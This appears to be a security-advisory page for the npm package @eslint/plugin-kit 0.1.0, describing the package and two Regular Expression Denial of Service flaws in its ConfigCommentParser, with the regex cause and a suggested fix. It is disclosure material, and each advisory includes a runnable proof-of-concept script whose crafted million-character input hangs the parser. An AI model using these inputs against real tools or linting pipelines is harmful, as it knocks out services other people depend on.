The initial release of @eslint/plugin-kit, version 0.1.0, introduces a package of shared utilities for ESLint plugin authors. It collects building blocks that plugins would otherwise reimplement, the most security-relevant of which is ConfigCommentParser: the class that parses the configuration text found in inline ESLint directive comments, both the `key: value, key: value` string form and the JSON-like object form. Because that text comes from the files being linted, the parser is an input boundary, and the advisories listed further down this page all concern it.
This version depends on levn, which ConfigCommentParser uses to parse JSON-like configuration values, and on @eslint/core, which ties the kit to the types and interfaces of the ESLint core. The development dependencies describe a complete build and test pipeline: Mocha runs the tests, c8 measures coverage, Rollup bundles the library for distribution, and TypeScript provides type checking and declarations. The package is published under the Apache-2.0 license. Since 0.1.0 is the first release, there is no earlier version to compare it against.
All vulnerabilities affecting version 0.1.0 of the package
Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit
A very large, specially crafted string passed to ConfigCommentParser#parseStringConfig makes its regular expression backtrack quadratically: CPU usage goes to 100% and the calling program hangs for what is effectively forever.
const { ConfigCommentParser } = require("@eslint/plugin-kit");

// Attack input: one million spaces followed by a single non-space character.
// The whitespace-handling regular expression inside parseStringConfig matches
// the whole run, fails on the "A", and is retried from every offset in the run.
var str = "";
for (var i = 0; i < 1000000; i++) {
    str += " ";
}
str += "A";

console.log("start");
var parser = new ConfigCommentParser();
console.log(parser.parseStringConfig(str, ""));
console.log("end");

// Run `npm i @eslint/plugin-kit` (an affected version such as 0.1.0) and `node attack.js`.
// The process prints "start" and then hangs at high CPU; "end" is never printed.
@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser
The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack through its only argument.
The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 has quadratic runtime on adversarial input because the grouped expression is not anchored: the group may begin at every character of a long identifier run, and each attempt rescans the remainder of the run before the trailing `:` fails. The advisory proposes fixing this by prepending [^-a-zA-Z0-9/] to the regular expression so that a match can only start at the beginning of a run. Note that a plain prepended character class consumes the preceding character and cannot match a key at the very start of the string; a negative lookbehind on the same class gives the same anchoring without either side effect.
const { ConfigCommentParser } = require("@eslint/plugin-kit");

// Attack input: one million identifier characters followed by "?", which can
// never complete a `key:` match, so the unanchored group is retried from every
// offset in the run.
const str = `${"A".repeat(1000000)}?: 1 B: 2`;

console.log("start");
var parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end");

// Run `npm i @eslint/plugin-kit@0.3.3` (0.1.0 is affected as well) and `node attack.js`.
// The process prints "start" and then hangs at high CPU; "end" is never printed.
Both issues are Regular Expression Denial of Service: untrusted input reaching these parsers blocks the event loop at high CPU for the duration of the backtracking, which for inputs of this size is effectively forever. Any plugin or tool that passes text it does not control into ConfigCommentParser, such as the contents of a directive comment in a file being linted, is exposed, so the practical attack path is a crafted source file rather than a direct API call.